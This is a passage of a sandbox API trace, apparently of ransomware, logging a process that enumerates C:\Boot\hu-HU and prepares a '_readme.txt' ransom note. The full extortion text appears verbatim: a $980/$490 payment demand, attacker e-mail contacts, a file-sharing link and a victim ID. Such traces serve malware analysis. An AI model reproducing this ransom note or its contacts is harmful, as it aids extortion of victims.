dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.639] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.639] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.639] PathFindFileNameW (pszPath="C:\\Boot\\hu-HU\\") returned="hu-HU\\" [0165.639] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0165.639] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.639] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0165.639] PathFindFileNameW (pszPath="") returned="" [0165.640] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0165.640] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0165.640] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b40090 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0165.640] FreeLibrary (hLibModule=0x759d0000) returned 1 [0165.640] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.640] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.640] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.640] PathAppendW (in: pszPath="C:\\Boot\\hu-HU\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\hu-HU\\_readme.txt") returned 1 [0165.640] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.640] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.640] PathFileExistsW (pszPath="C:\\Boot\\hu-HU\\_readme.txt") returned 0 [0165.641] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x7d00) returned 0x3b44e70 [0165.641] lstrcpyW (in: lpString1=0x3b44e70, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" [0165.641] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde", lpString2="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" [0165.641] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b1a750 [0165.641] CreateFileW (lpFileName="C:\\Boot\\hu-HU\\_readme.txt" (normalized: "c:\\boot\\hu-hu\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0165.641] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b1a750 | out: hHeap=0xcd0000) returned 1 [0165.641] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44e70 | out: hHeap=0xcd0000) returned 1 [0165.641] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.641] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.641] FindFirstFileW (in: lpFileName="C:\\Boot\\hu-HU\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0165.641] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.641] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0165.642] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe817e7d8, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16240, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0165.642] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe817e7d8, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16240, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0165.642] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0165.642] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.642] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c200 | out: hHeap=0xcd0000) returned 1 [0165.642] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c200 [0165.642] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0165.642] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.642] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.642] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.642] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.642] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.642] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.642] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.642] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.642] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.642] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.642] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.642] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.642] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.642] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.642] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.642] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.642] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.642] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.642] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.642] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.642] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.642] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.642] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.642] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.642] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.643] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.643] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b40090 [0165.643] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.643] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.643] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.643] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.643] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.643] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.643] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.643] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.643] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.643] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.643] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.643] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.643] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.643] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.643] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.643] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.643] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.643] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.643] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.643] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.643] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.643] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.643] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.643] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.643] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.643] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.643] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.643] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.643] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.643] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.643] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.643] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.643] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.643] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.643] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.643] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.643] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.644] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.644] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.644] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.644] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.644] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.644] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.644] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.644] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.644] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.644] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.644] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.644] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.644] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.644] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.644] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.644] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.644] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.644] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.644] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.644] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.644] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.644] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.644] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.644] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.644] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.644] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.644] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.644] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.644] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.645] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.645] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.645] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.645] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.645] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.645] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.645] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.645] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.645] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.645] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b40090 [0165.645] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.645] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.645] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.645] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.645] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.645] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.645] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.645] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.645] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.645] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.645] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.645] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.645] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.645] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.645] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.645] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.645] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.645] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.645] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.645] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.645] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.645] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.645] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.645] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.645] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.645] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.645] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.646] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.646] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.646] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.646] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.646] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.646] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.646] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.646] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.646] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.646] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, 